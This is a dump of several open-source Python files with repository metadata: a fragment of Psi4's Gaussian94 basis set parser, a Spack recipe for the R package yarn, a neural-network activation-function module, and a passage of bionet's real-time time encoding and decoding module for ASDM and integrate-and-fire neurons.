for am in range(maxam+1):
#f-ul potential"
line = lines[lineno]
lineno += 1
angmom = symbol_to_am[line.lstrip()[0]]
if am == 0: angmom = -angmom # Flag this as a Type1 shell, by setting negative AM. This'll be handled in the BasisSet builder.
line = lines[lineno]
lineno += 1
nprimitives = int(line)
rpowers = [0 for i in range(nprimitives)]
exponents = [0.0 for i in range(nprimitives)]
contractions = [0.0 for i in range(nprimitives)]
for term in range(nprimitives):
line = lines[lineno]
lineno += 1
line = line.replace('D', 'e', 2)
line = line.replace('d', 'e', 2)
what = ecpinfo.match(line)
if not what:
raise ValidationError("""Gaussian94BasisSetParser::parse: Bad ECP specification : line %d: %s""" % (lineno, line))
rpowers[term] = int(what.group(1))
exponents[term] = float(what.group(2))
contractions[term] = float(what.group(3))
# We have a full shell, push it to the basis set
ecp_shell_list.append(ShellInfo(angmom, contractions, exponents,
gaussian_type, 0, center, 0, 'Normalized', rpowers))
else:
# This is a basis set spec
basis_found = True
msg = """line %5d""" % (lineno)
# Need to do the following until we match a "****" which is the end of the basis set
while not separator.match(line):
# Match shell information
if shell.match(line):
what = shell.match(line)
shell_type = str(what.group(1)).upper()
nprimitive = int(what.group(2))
scale = float(what.group(3))
if len(shell_type) == 1:
am = shell_to_am[shell_type[0]]
exponents = [0.0] * nprimitive
contractions = [0.0] * nprimitive
for p in range(nprimitive):
line = lines[lineno]
lineno += 1
line = line.replace('D', 'e', 2)
line = line.replace('d', 'e', 2)
what = primitives1.match(line)
# Must match primitives1; will work on the others later
if not what:
raise ValidationError("""Gaussian94BasisSetParser::parse: Unable to match an exponent with one contraction: line %d: %s""" % (lineno, line))
exponent = float(what.group(1))
contraction = float(what.group(2))
# Scale the contraction and save the information
contraction *= scale
exponents[p] = exponent
contractions[p] = contraction
# We have a full shell, push it to the basis set
shell_list.append(ShellInfo(am, contractions, exponents,
gaussian_type, 0, center, 0, 'Unnormalized'))
elif len(shell_type) == 2:
# This is to handle instances of SP, PD, DF, FG, ...
am1 = shell_to_am[shell_type[0]]
am2 = shell_to_am[shell_type[1]]
exponents = [0.0] * nprimitive
contractions1 = [0.0] * nprimitive
contractions2 = [0.0] * nprimitive
for p in range(nprimitive):
line = lines[lineno]
lineno += 1
line = line.replace('D', 'e', 2)
line = line.replace('d', 'e', 2)
what = primitives2.match(line)
# Must match primitivies2
if not what:
raise ValidationError("Gaussian94BasisSetParser::parse: Unable to match an exponent with two contractions: line %d: %s" % (lineno, line))
exponent = float(what.group(1))
contraction = float(what.group(2))
# Scale the contraction and save the information
contraction *= scale
exponents[p] = exponent
contractions1[p] = contraction
# Do the other contraction
contraction = float(what.group(3))
# Scale the contraction and save the information
contraction *= scale
contractions2[p] = contraction
shell_list.append(ShellInfo(am1, contractions1, exponents,
gaussian_type, 0, center, 0, 'Unnormalized'))
shell_list.append(ShellInfo(am2, contractions2, exponents,
gaussian_type, 0, center, 0, 'Unnormalized'))
else:
raise ValidationError("""Gaussian94BasisSetParser::parse: Unable to parse basis sets with spd, or higher grouping""")
else:
raise ValidationError("""Gaussian94BasisSetParser::parse: Expected shell information, but got: line %d: %s""" % (lineno, line))
line = lines[lineno]
lineno += 1
if not basis_found:
#raise BasisSetNotFound("Gaussian94BasisSetParser::parser: Unable to find the basis set for %s in %s" % \
# (symbol, self.filename), silent=True)
return None, None, None, None, None
return shell_list, msg, ecp_shell_list, ecp_msg, ncore
|
jH0ward/psi4
|
psi4/driver/qcdb/libmintsbasissetparser.py
|
Python
|
lgpl-3.0
| 16,141
|
[
"Gaussian",
"Psi4"
] |
764cca97cba4b2b7725ad088c26931ad5c546a8485996eac8b71bc4ce87ecfb3
|
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class RYarn(RPackage):
"""Expedite large RNA-Seq analyses using a combination of previously
developed tools. YARN is meant to make it easier for the user in
performing basic mis-annotation quality control, filtering, and
condition-aware normalization. YARN leverages many Bioconductor tools
and statistical techniques to account for the large heterogeneity and
sparsity found in very large RNA-seq experiments."""
homepage = "https://bioconductor.org/packages/yarn/"
url = "https://git.bioconductor.org/packages/yarn"
list_url = homepage
version('1.2.0', git='https://git.bioconductor.org/packages/yarn', commit='28af616ef8c27dcadf6568e276dea8465486a697')
depends_on('r-biobase', type=('build', 'run'))
depends_on('r-biomart', type=('build', 'run'))
depends_on('r-downloader', type=('build', 'run'))
depends_on('r-edger', type=('build', 'run'))
depends_on('r-gplots', type=('build', 'run'))
depends_on('r-limma', type=('build', 'run'))
depends_on('r-matrixstats', type=('build', 'run'))
depends_on('r-preprocesscore', type=('build', 'run'))
depends_on('r-readr', type=('build', 'run'))
depends_on('r-rcolorbrewer', type=('build', 'run'))
depends_on('r-quantro', type=('build', 'run'))
depends_on('r@3.4.0:3.4.9', when='@1.2.0')
|
EmreAtes/spack
|
var/spack/repos/builtin/packages/r-yarn/package.py
|
Python
|
lgpl-2.1
| 2,596
|
[
"Bioconductor"
] |
e8ffc74e1b7ddbe4d17a227513246d618512f005862fa6a2c48890a798a22104
|
'''
Created on Oct 9, 2014
@author: dusenberrymw
'''
import math
class Logistic(object):
"""The Logistic (Sigmoid) activation function, which is one of the
possibilities that can be used by the network
"""
def __init__(self):
self.name = "logistic"
def activate(self, input_value):
"""Run the input value through the sigmoid function
This will only return values between 0 and 1
"""
try:
return 1 / (1 + math.exp(-1*input_value))
except OverflowError:
# bound the numbers if there is an overflow
print("overflow")
if input_value < 0:
return 0.0000000000001 #logistic func goes to 0 for small x
else:
return 0.9999999999999
def derivative(self, fx):
"""Calculate derivative of logistic function, given an output F(x)
Given F is the logistic (sigmoid) function, the derivative
F'(x) = F(x) * (1 - F(x))
F(x) will be passed in for efficiency
"""
return fx*(1-fx)
def inverse(self, input_value):
"""This will produce the inverse of the sigmoid function, which is
useful in determining the original value before activation
"""
return math.log(input_value/(1-input_value))
def cost(self, hypothesis_output, target_output):
"""Cost function of a node using the logistic activation function
cost(h_theta(x), y) = -log(h_theta(x)) if y = 1
-log(1-h_theta(x)) if y = 0
where h_theta(x) is the hypothesis (computed output) of the
node evaluated with respect to theta (parameter/weight vector)
evaluated at input x,
and cost is the "error" of the node with respect to
hypothesis of x parameterized by theta (weights & threshold
vectors) given the target value y
This cost function essentially allows for no error if the hypothesis
is equal to the target y, and high error otherwise
Note: 'log' is the natural log
"""
y = target_output
hx = hypothesis_output
c = -y*math.log(hx) - (1-y)*math.log(1-hx)
return c
def cost_derivative(self, hypothesis_output, target_output):
"""Partial derivative of the cost function wrt the hypothesis of a
neuron using the logistic activation function
This will basically determine how much the hypothesis (output of the
neuron) contributed to the cost ("error") of the neuron
"""
y = target_output
hx = hypothesis_output
dc = (y-1)/(hx-1) - y/hx
return dc
class Tanh(object):
"""The Tanh (Logistic spinoff) activation function, which is one of the
possibilities that can be used by the network
"""
def __init__(self):
self.name = "tanh"
def activate(self, input_value):
"""Run the input value through the tanh function"""
#return math.tanh(input_value)
return ((math.exp(input_value)-math.exp(-input_value)) /
(math.exp(input_value)+math.exp(-input_value)))
def derivative(self, fx):
"""Some training will require the derivative of the tanh function"""
return (1.0-fx) * (1.0+fx)
def inverse(self, input_value):
"""This will produce the inverse of the tanh function, which is
useful in determining the original value before activation
"""
return math.atanh(input_value)
def cost(self, hypothesis_output, target_output):
"""Cost function of a node using the tanh activation function
cost(h_theta(x), y) = (1/2)*(|h_theta(x)-y|^2)
"""
y = target_output
hx = hypothesis_output
c = (1/2)*((hx-y)**2)
return c
def cost_derivative(self, hypothesis_output, target_output):
"""Partial derivative of the cost function wrt the hypothesis of a
neuron using the tanh activation function
This will basically determine how much the hypothesis (output of the
neuron) contributed to the cost ("error") of the neuron
"""
y = target_output
hx = hypothesis_output
dc = hx - y
return dc
class Linear(object):
"""The Linear activation function, which is one of the
possibilities that can be used by the network
"""
def __init__(self):
self.name = "linear"
def activate(self, input_value):
"""In the linear function, f(z) = z"""
return input_value
def derivative(self, fx):
"""Some training will require the derivative of the linear function
which is just 1
"""
return 1
def inverse(self, input_value):
"""This will produce the inverse of the linear function, which is
useful in determining the original value before activation
"""
return input_value
def cost(self, hypothesis_output, target_output):
"""Cost function of a node using the Linear activation function
cost(h_theta(x), y) = (1/2)*((h_theta(x)-y)^2)
"""
y = target_output
hx = hypothesis_output
c = (1/2)*((hx-y)**2)
return c
def cost_derivative(self, hypothesis_output, target_output):
"""Partial derivative of the cost function wrt the hypothesis of a
neuron using the linear activation function
This will basically determine how much the hypothesis (output of the
neuron) contributed to the cost ("error") of the neuron
"""
y = target_output
hx = hypothesis_output
dc = hx - y
return dc
|
dusenberrymw/Pine
|
pine/activation.py
|
Python
|
mit
| 5,768
|
[
"NEURON"
] |
fe2a0ab2a3ac3bd48d0196f05490a5f4e46ea3c441fb4209d5bbe276c0491e6d
|
#!/usr/bin/env python
"""
Real-time time encoding and decoding algorithms. These algorithms
can process signals of arbitrarily long length without the memory
limitations of the functions in the asdm and iaf modules.
- ASDMRealTimeDecoder - Real-time ASDM decoder.
- ASDMRealTimeDecoderIns - Parameter-insensitive real-time ASDM decoder.
- ASDMRealTimeEncoder - Real-time ASDM encoder.
- IAFRealTimeEncoder - Real-time IAF encoder.
- IAFRealTimeDecoder - Real-time IAF decoder.
- iaf_decode - Functional wrapper for IAFRealTimeDecoder
- iaf_encode - Functional wrapper for IAFRealTimeEncoder
- iaf_decode_delay - Real-time delayed IAF decoder.
- iaf_encode_delay - Real-time delayed IAF encoder.
"""
# Copyright (c) 2009-2015, Lev Givon
# All rights reserved.
# Distributed under the terms of the BSD license:
# http://www.opensource.org/licenses/bsd-license
__all__ = ['SignalProcessor',
'RealTimeEncoder', 'RealTimeDecoder',
'ASDMRealTimeEncoder', 'ASDMRealTimeDecoder',
'ASDMRealTimeDecoderIns',
'IAFRealTimeEncoder', 'IAFRealTimeDecoder',
'iaf_decode', 'iaf_encode',
'iaf_decode_delay', 'iaf_encode_delay']
# Setting this flag enables the silent generation of a debug plot
# depicting the progress of the stitching algorithm employed in the
# real-time decoders.
debug = False
if debug:
try:
from matplotlib.figure import Figure
from matplotlib.backends.backend_agg import FigureCanvasAgg
except ImportError:
debug = False
else:
debug_plot_filename = 'rt_debug.png'
debug_plot_figsize = (7, 5)
debug_plot_dpi = 100
import numpy as np
import bionet.utils.misc as m
import bionet.utils.numpy_extras as ne
import bionet.ted.asdm as asdm
import bionet.ted.iaf as iaf
import bionet.ted.vtdm as vtdm
class SignalProcessor(object):
"""
Abstract signal processor.
This class describes a signal processor that retrieves blocks
of signal data from a source, applies some processing algorithm to
it, and saves the processed blocks.
Methods
-------
process(get, put)
Process data obtained from `get()` and write it using `put()`.
Notes
-----
The `process()` method must be extended in functional subclasses of this
class in order.
"""
def __init__(self, *args):
"""Initialize a signal processor with the specified
parameters."""
self.params = args
def __call__(self, x):
"""Calling a class instance is equivalent to running the
processor on the specified sequence `x`."""
result = []
iterator = m.chunks(x, len(x)/10)
def get():
try:
return iterator.next()
except StopIteration:
return []
def put(y):
result.extend(y)
self.process(get, put)
return result
def process(self, get, put):
"""Process data obtained in blocks from the function `get()`
and write them out using the function `put()`."""
if not callable(get):
raise ValueError('get() must be callable')
if not callable(put):
raise ValueError('put() must be callable')
def __repr__(self):
"""Represent a signal processor in terms its parameters."""
return self.__class__.__name__+repr(tuple(self.params))
class RealTimeEncoder(SignalProcessor):
"""
Abstract real-time time encoding machine.
This class implements a real-time time encoding machine. It
must be subclassed to use a specific encoding algorithm.
Methods
-------
encode(data, ...)
Encode a block of data using the additional parameters.
process(get, put)
Process data obtained from `get()` and write it using `put()`.
Notes
-----
The `encode()` method must be extended to contain a time encoding
algorithm implementation in functional subclasses of this class.
"""
def __init__(self, *args):
"""Initialize a real-time time encoder."""
SignalProcessor.__init__(self, *args)
def encode(self, *args):
"""Encode a block of data. This method must be reimplemented
to use a specific encoding algorithm implementation."""
pass
def process(self, get, put):
"""Encode data returned in blocks by function `get()` and
write it to some destination using the function `put()`."""
SignalProcessor.process(self, get, put)
# The invocation of self.encode() assumes that the method
# returns a tuple containing processed data in its first entry
# followed by all of the parameters be passed back to the
# method in subsequent invocations:
while True:
input_data = get()
if len(input_data) == 0:
break
temp = self.encode(input_data)
encoded_data = temp[0]
self.params = temp[1:]
put(encoded_data)
class RealTimeDecoder(SignalProcessor):
"""
Abstract real-time time decoding machine.
This class implements a real-time time decoding machine. It
must be subclassed to use a specific decoding algorithm.
Parameters
----------
dt : float
Sampling resolution of input signal; the sampling frequency
is `1/dt` Hz.
bw : float
Signal bandwidth (in rad/s).
N : int
Number of spikes to process in each block less 1.
M : int
Number of spikes between the starting time of each successive
block.
K : int
Number of spikes in the overlap between successive blocks.
Methods
-------
decode(data, ...)
Decode a block of data using the additional parameters.
process(get, put)
Process data obtained from `get()` and write it using `put()`.
"""
def __init__(self, dt, bw, N, M, K):
SignalProcessor.__init__(self, dt, bw, N, M, K)
if N <= 1:
raise ValueError('N must exceed 1')
if M <= 0 or M > N/2:
raise ValueError('M must be in the range (0,N/2)')
if K < 1 or K >= N-2*M:
raise ValueError('K must be in the range [1,N-2*M)') # ???
self.dt = dt
self.bw = bw
self.N = N
self.M = M
self.K = K
self.J = N-2*M-K # number of spikes between overlapping blocks
# Needed to adjust sign for compensation principle used in
# decoding algorithm:
self.sgn = 1
# Spike intervals and spike indicies:
self.s = []
self.tk = np.array((), np.float)
# Overlap:
self.overlap = np.array((), np.float)
# Number of spike intervals that must be obtainable from the
# queue. For the first block, N+2 spike intervals must be
# retrieved because the last spike is discarded during the
# reconstruction:
self.intervals_needed = self.N+2
# When these flags are set, the block of data being decoded is
# windowed on its left and right sides as indicated. The
# following initial values are set because the very first
# block does not need to stitched to any other block:
self.window_left = False
self.window_right = True
if debug:
self.fig = Figure(figsize=debug_plot_figsize)
self.ax = self.fig.add_subplot(111)
self.ax.set_xlabel('t (s)')
self.ax.set_ylabel('y(t)')
self.offset = 0.0
def decode(self, *args):
"""Decode a block of data. This method must be reimplemented
to use a specific decoding algorithm implementation."""
pass
def process(self, get, put):
"""Decode data returned in blocks by function `get()` and
write it to some destination using the function `put()`."""
SignalProcessor.process(self, get, put)
# Set up a buffer to queue input data from the source:
# XXX: the number of initial entries here is arbitrary:
sb = m.SerialBuffer(get, 10*self.N)
while True:
# Get new data to add to the block of encoded data to be
# decoded:
self.intervals_to_add = sb.read(self.intervals_needed)
# If the number of intervals actually obtained is less
# than that requested, then the final block has been
# reached and hence should not be windowed on its right side:
if len(self.intervals_to_add) < self.intervals_needed:
self.window_right = False
# Add the read data to the block to be decoded:
self.s.extend(self.intervals_to_add)
# After the first block, the number of extra spike
# intervals to read during subsequent iterations should be
# equal to J:
if self.intervals_needed != self.J:
self.intervals_needed = self.J
else:
del self.s[0:self.J]
# Find the times of the spikes in the current block:
self.ts = np.cumsum(self.s)
self.tk = np.array(np.round(self.ts/self.dt), int)
self.curr_dur = max(self.ts)
self.t = np.arange(0, self.curr_dur, self.dt)
# Decode the current block:
self.u = self.decode(self.s)
# Discard the portion of the reconstructed signal after
# the second to last spike interval for all blocks except the
# last one:
if self.window_right:
self.n = self.tk[-1]
self.tk = self.tk[0:-1]
self.u = self.u[0:self.n]
self.t = self.t[0:self.n]
# The sign of the spike at the beginning of the next block
# must be the reverse of the current one if J is odd:
if self.J % 2:
self.sgn *= -1
# Construct and apply shaping window to decoded signal:
if self.window_left:
ll = self.ts[self.M]
lr = self.ts[self.M+self.K]
else:
ll = -self.dt # needed to force first entry in window to be 1
lr = 0.0
if self.window_right:
rl = self.ts[self.N-self.M-self.K]
rr = self.ts[self.N-self.M]
else:
rl = self.t[-1]
rr = self.t[-1]
self.w = self.window(self.t, ll, lr, rl, rr)
self.uw = self.u*self.w
if debug:
self.ax.plot(self.offset+self.t, self.uw)
# Apart from the first block, the saved nonzero
# overlapping portion of the previous block must be
# combined with that of the current block:
if self.window_left:
self.u_out = self.overlap + \
self.uw[self.tk[self.M]:self.tk[self.M+self.K]]
else:
self.u_out = self.uw[0:self.tk[self.M+self.K]]
# Apart from the last block, the nonzero portion of the
# current block that will overlap with the next block must
# be retained for the next iteration:
if self.window_right:
self.u_out = np.hstack((self.u_out,
self.uw[self.tk[self.M+self.K]:self.tk[self.N-self.M-self.K]]))
self.overlap = \
self.uw[self.tk[self.N-self.M-self.K]:self.tk[self.N-self.M]]
if debug:
self.offset += self.t[self.tk[self.J-1]]
else:
self.u_out = np.hstack((self.u_out,
self.uw[self.tk[self.M+self.K]::]))
self.overlap = np.array((), np.float)
if debug:
self.offset += 0
# The first block decoded should only be windowed on its
# right side if at all. Hence, if window_left is false and
# window_right is true, window_left should be set to true
# before the next block is processed so that it is
# windowed on its left side:
if self.window_right and not self.window_left:
self.window_left = True
# Write out the current decoded block:
put(self.u_out)
# If window_left is true and window_right is false, the
# last block has been decoded and processing is complete:
if not self.window_right:
break
def __call__(self, x):
"""Calling a class instance is equivalent to running the
decoder on the specified sequence `x`."""
result = SignalProcessor.__call__(self, x)
if debug:
self.canvas = FigureCanvasAgg(self.fig)
self.canvas.print_figure(debug_plot_filename,
debug_plot_dpi)
return result
# Methods for computing the edges of the windows determined by the
# windows() method:
def _theta1(self, t, l, r):
return np.sin((np.pi/2)*(t-l)/(r-l))**2
def _theta2(self, t, l, r):
return np.cos((np.pi/2)*(t-l)/(r-l))**2
def window(self, t, ll, lr, rl, rr):
"""Return a window defined over the vector of times t that
forms a partition of unity over all time. The function is
equal to 0 when t <= ll or t > rr, theta(t,ll,lr) when ll < t
<= lr, 1 when lr < t <= rl, and 1-theta(t,rl,rr)
when rl < t <= rr."""
w = np.zeros(len(t), np.float)
i1 = np.intersect1d(np.where(ll < t)[0], np.where(t <= lr)[0])
i2 = np.intersect1d(np.where(lr < t)[0], np.where(t <= rl)[0])
i3 = np.intersect1d(np.where(rl < t)[0], np.where(t <= rr)[0])
w[i1] = self._theta1(t[i1], ll, lr)
w[i2] = 1.0
w[i3] = self._theta2(t[i3], rl, rr)
return w
class ASDMRealTimeEncoder(RealTimeEncoder):
"""
Real-time ASDM time encoding machine.
This class implements a real-time time encoding machine that uses
an Asynchronous Sigma-Delta Modulator to encode data.
Parameters
----------
dt : float
Sampling resolution of input signal; the sampling frequency
is `1/dt` Hz.
b : float
Encoder bias.
d : float
Encoder threshold.
k : float
Encoder integration constant.
dte : float
Sampling resolution assumed by the encoder. This may not exceed
`dt`.
quad_method : {'rect', 'trapz'}
Quadrature method to use (rectangular or trapezoidal).
Methods
-------
encode(data, ...)
Encode a block of data using the additional parameters.
process(get, put)
Process data obtained from `get()` and write it using `put()`.
"""
def __init__(self, dt, b, d, k=1.0, dte=0.0, quad_method='trapz'):
# The values 0, 0, and 1 passed to the constructor
# initialize the y, interval, and sgn parameters of the ASDM
# encoder function:
SignalProcessor.__init__(self, dt, b, d, k, dte,
0.0, 0.0, 1, quad_method, True)
def encode(self, data):
"""Encode a block of data with an ASDM encoder."""
return asdm.asdm_encode(data, *self.params)
class ASDMRealTimeDecoder(RealTimeDecoder):
"""
Real-time ASDM time decoding machine.
This class implements a real-time time decoding machine that
decodes data encoded using an Asynchronous Sigma-Delta Modulator.
Parameters
----------
dt : float
Sampling resolution of input signal; the sampling frequency
is 1/dt Hz.
bw : float
Signal bandwidth (in rad/s).
b : float
Encoder bias.
d : float
Decoder threshold.
k : float
Decoder integration constant.
N : int
Number of spikes to process in each block less 1.
M : int
Number of spikes between the starting time of each successive
block.
K : int
Number of spikes in the overlap between successive blocks.
Methods
-------
decode(data, ...)
Decode a block of data using the additional parameters.
process(get, put)
Process data obtained from `get()` and write it using `put()`.
"""
def __init__(self, dt, bw, b, d, k, N, M, K):
RealTimeDecoder.__init__(self, dt, bw, N, M, K)
self.b = b
self.d = d
self.k = k
def decode(self, data):
"""Decode a block of data that was encoded with an ASDM
encoder."""
return vtdm.asdm_decode_vander(data, self.curr_dur, self.dt,
self.bw, self.b, self.d, self.k,
self.sgn)
class ASDMRealTimeDecoderIns(RealTimeDecoder):
"""
Real-time threshold-insensitive ASDM time decoding machine.
This class implements a threshold-insensitive real-time time
decoding machine that decodes data encoded using an Asynchronous
Sigma-Delta Modulator.
Parameters
----------
dt : float
Sampling resolution of input signal; the sampling frequency
is `1/dt` Hz.
bw : float
Signal bandwidth (in rad/s).
b : float
Encoder bias.
N : int
Number of spikes to process in each block less 1.
M : int
Number of spikes between the starting time of each successive
block.
K : int
Number of spikes in the overlap between successive blocks.
Methods
-------
decode(data, ...)
Decode a block of data using the additional parameters.
process(get, put)
Process data obtained from `get()` and write it using `put()`.
"""
def __init__(self, dt, bw, b, N, M, K):
RealTimeDecoder.__init__(self, dt, bw, N, M, K)
self.b = b
def decode(self, data):
"""Decode a block of data that was encoded with an ASDM
encoder."""
return vtdm.asdm_decode_vander_ins(data, self.curr_dur, self.dt,
self.bw, self.b, self.sgn)
class IAFRealTimeEncoder(RealTimeEncoder):
"""
Real-time IAF neuron time encoding machine.
This class implements a real-time time encoding machine that uses
an Integrate-and-Fire neuron to encode data.
Parameters
----------
dt : float
Sampling resolution of input signal; the sampling frequency
is `1/dt` Hz.
b : float
Encoder bias.
d : float
Encoder threshold.
R : float
Neuron resistance.
C : float
Neuron capacitance.
dte : float
Sampling resolution assumed by the encoder. This may not exceed
`dt`.
quad_method : {'rect', 'trapz'}
Quadrature method to use (rectangular or trapezoidal).
Methods
-------
encode(data, ...)
Encode a block of data using the additional parameters.
process(get, put)
Process data obtained from `get()` and write it using `put()`.
"""
def __init__(self, dt, b, d, R=np.inf, C=1.0, dte=0.0, quad_method='trapz'):
# The values 0 and 0 passed to the constructor initialize the
# y and interval parameters of the IAF encoder function:
SignalProcessor.__init__(self, dt, b, d, R, C, dte,
0.0, 0.0, quad_method, True)
def encode(self, data):
"""Encode a block of data with an IAF neuron."""
return iaf.iaf_encode(data, *self.params)
class IAFRealTimeDecoder(RealTimeDecoder):
"""
Real-time IAF neuron time decoding machine.
This class implements a real-time time decoding machine that
decodes data encoded using an Integrate-and-Fire neuron.
Parameters
----------
dt : float
Sampling resolution of input signal; the sampling frequency
is `1/dt` Hz.
bw : float
Signal bandwidth (in rad/s).
b : float
Encoder bias.
d : float
Decoder threshold.
R : float
Neuron resistance.
C : float
Neuron capacitance.
N : int
Number of spikes to process in each block less 1.
M : int
Number of spikes between the starting time of each successive
block.
K : int
Number of spikes in the overlap between successive blocks.
Methods
-------
decode(data, ...)
Decode a block of data using the additional parameters.
process(get, put)
Process data obtained from `get()` and write it using `put()`.
"""
def __init__(self, dt, bw, b, d, R, C, N, M, K):
RealTimeDecoder.__init__(self, dt, bw, N, M, K)
self.b = b
self.d = d
self.R = R
self.C = C
def decode(self, data):
"""Decode a block of data that was encoded with an
IAF neuron."""
return vtdm.iaf_decode_vander(data, self.curr_dur, self.dt,
self.bw, self.b, self.d, self.R, self.C)
def iaf_encode(u, dt, b, d, R=np.inf, C=1.0, dte=0, quad_method='trapz'):
"""
Real-time IAF neuron time encoding machine.
Encode a finite length signal with an Integrate-and-Fire neuron.
Parameters
----------
u : array_like of floats
Signal to encode.
dt : float
Sampling resolution of input signal; the sampling frequency
is 1/dt Hz.
b : float
Encoder bias.
d : float
Encoder threshold.
R : float
Neuron resistance.
C : float
Neuron capacitance.
dte : float
Sampling resolution assumed by the encoder (s).
This may not exceed `dt`.
quad_method : {'rect', 'trapz'}
Quadrature method to use (rectangular or trapezoidal) when the
neuron is ideal; exponential Euler integration is used
when the neuron is leaky.
Returns
-------
s : ndarray of floats
Returns the signal encoded as an
array of time intervals between spikes.
Notes
-----
When trapezoidal integration is used, the value of the integral
will not be computed for the very last entry in `u`.
"""
encoder = IAFRealTimeEncoder(dt, b, d, R, C, dte, quad_method)
return np.asarray(encoder(u))
def iaf_decode(s, dt, bw, b, d, R, C, N=10, M=3, K=1):
"""
Real-time IAF neuron time decoding machine.
Decode a finite length signal encoded with an Integrate-and-Fire
neuron.
Parameters
----------
s : ndarray of floats
Encoded signal. The values represent the time between spikes (in s).
dt : float
Sampling resolution of original signal; the sampling frequency
is 1/dt Hz.
bw : float
Signal bandwidth (in rad/s).
b : float
Encoder bias.
d : float
Encoder threshold.
R : float
Neuron resistance.
C : float
Neuron capacitance.
N : int
Number of spikes to process in each block less 1.
M : int
Number of spikes between the starting time of each successive
block.
K : int
Number of spikes in the overlap between successive blocks.
Returns
-------
u_rec : ndarray of floats
Recovered signal.
"""
decoder = IAFRealTimeDecoder(dt, bw, b, d, R, C, N, M, K)
return np.asarray(decoder(s))
def iaf_encode_delay(u_list, T_block, t_begin, dt,
b_list, d_list, k_list, a_list, w_list):
"""
Real-time multi-input multi-output delayed IAF time encoding machine.
Encode several with an ensemble of ideal Integrate-and-Fire
neurons with delays.
Parameters
----------
u_list : list
Signals to encode. Must contain `M` arrays of equal length.
T_block : float
Length of block to encode (in s) during each iteration.
t_begin : float
Time at which to begin encoding (in s).
dt : float
Sampling resolution of input signals; the sampling frequency
is 1/dt Hz.
b_list : list
List of encoder biases. Must be of length `M`.
d_list : list
List of encoder thresholds. Must be of length `M`.
k_list : list
List of encoder integration constants. Must be of length `M`.
a_list : array_like
Array of neuron delays (in s). Must have shape `(N, M)`.
w_list : array_like
Array of scaling factors. Must have shape `(N, M)`.
Returns
-------
s_list : list
List of arrays of interspike intervals.
"""
M = len(u_list)
if not M:
raise ValueError('no spike data given')
if len(set(map(len, u_list))) > 1:
raise ValueError('all input signals must be of the same length')
Nt = len(u_list[0])
N = len(b_list) # number of neurons
# Initialize interspike interval storage lists:
s_list = [[] for i in xrange(N)]
# Initialize integrator and current interspike interval arrays:
interval_list = [0.0 for i in xrange(N)]
y_list = [0.0 for i in xrange(N)]
# Convert times to integer indicies to avoid index round-off problems:
if T_block <= t_begin:
raise ValueError('block length must exceed start time')
a_max = np.max(a_list)
T = T_block
t_start = 0.0
t_end = T
K = ne.ifloor((T-t_begin)/dt)
k_start = 0
k_end = ne.ifloor(t_end/dt)
count = 0
while k_start < Nt:
# Convert the bounds of the interval to encode to indices:
print '%i: window: [%f, %f]' % (count, k_start*dt, k_end*dt)
count += 1
# Encode the block:
u_block_list = map(lambda x: x[k_start:k_end], u_list)
s_curr_list, t_begin, dt, b_list, d_list, k_list, a_list, \
w_list, y_list, interval_list, full_output = \
iaf.iaf_encode_delay(u_block_list,
t_begin,
dt, b_list, d_list, k_list,
a_list, w_list,
y_list, interval_list, True)
# Save the encoded data:
for i in xrange(N):
s_list[i].extend(s_curr_list[i])
# Advance k_start and k_end:
k_start += K
k_end += K
# When the end of the signal is reached, the encoding block
# must be shortened:
if k_end > Nt:
k_end = Nt
return map(np.asarray, s_list)
def _theta1(t, l, r):
return np.sin((np.pi/2)*(t-l)/(r-l))**2
def _theta2(t, l, r):
return np.cos((np.pi/2)*(t-l)/(r-l))**2
def _get_spike_block(s_list, t_start, t_end):
"""
Get block of interspike intervals.
If `s_list` contains arrays of interspike intervals, return a list
of subarrays containing those interspike intervals between the
times `t_start` and `t_end`.
Parameters
----------
s_list : list
List of interspike interval arrays.
t_start : float
Starting time of block.
t_end : float
Ending time of block.
Returns
-------
s_block_list : list
List of interspike interval subarrays containing the desired values.
Notes
-----
The first interspike interval in each subarray in the returned
block is adjusted to avoid introducing incorrect shifts between
each spike train.
"""
if t_end <= t_start:
raise ValueError('t_end must exceed t_start')
ts_list = map(np.cumsum, s_list)
s_block_list = []
for i in xrange(len(s_list)):
block_indices = \
np.intersect1d(np.where(ts_list[i] > t_start)[0],
np.where(ts_list[i] <= t_end)[0])
s_block = s_list[i][block_indices].copy()
# Adjust first interspike interval in the block:
s_block[0] = ts_list[i][block_indices[0]]-t_start
s_block_list.append(s_block.copy())
return s_block_list
def iaf_decode_delay(s_list, T_block, T_overlap, dt,
b_list, d_list, k_list, a_list, w_list):
"""
Real-time multi-input multi-output delayed IAF time decoding machine.
Decode several signals encoded with an ensemble of ideal
Integrate-and-Fire neurons with delays.
Parameters
----------
s : list of ndarrays of floats
Signals encoded by an ensemble of encoders. The values
represent the time between spikes (in s). The number of arrays
in the list corresponds to the number of encoders in the ensemble.
T_block : float
Length of block to decode during each iteration (in s).
T_overlap : float
Length of overlap between successive blocks (in s).
dt : float
Sampling resolution of input signals; the sampling frequency
is 1/dt Hz.
b_list : list
List of encoder biases. Must be of length `N`.
d_list : list
List of encoder thresholds. Must be of length `N`.
k_list : list
List of encoder integration constants. Must be of length `N`.
a_list : array_like
Array of neuron delays (in s). Must be of shape `(N, M)`.
w_list : array_like
Array of scaling factors. Must be of shape `(N, M)`.
Returns
-------
u_list : list
Decoded signals.
"""
if 2*T_overlap >= T_block:
raise ValueError('overlap cannot exceed half of the block length')
# Stitching the first and last blocks requires special treatment:
first_block = True
last_block = False
# Convert times to integer indicies to avoid index round-off problems:
K_block = ne.iround(T_block/dt)
K = K_block
K_overlap = ne.iround(T_overlap/dt)
# How much to shift the decoding window during each iteration:
K_inc = ne.iround((T_block-T_overlap)/dt)
# Decoding window bounds:
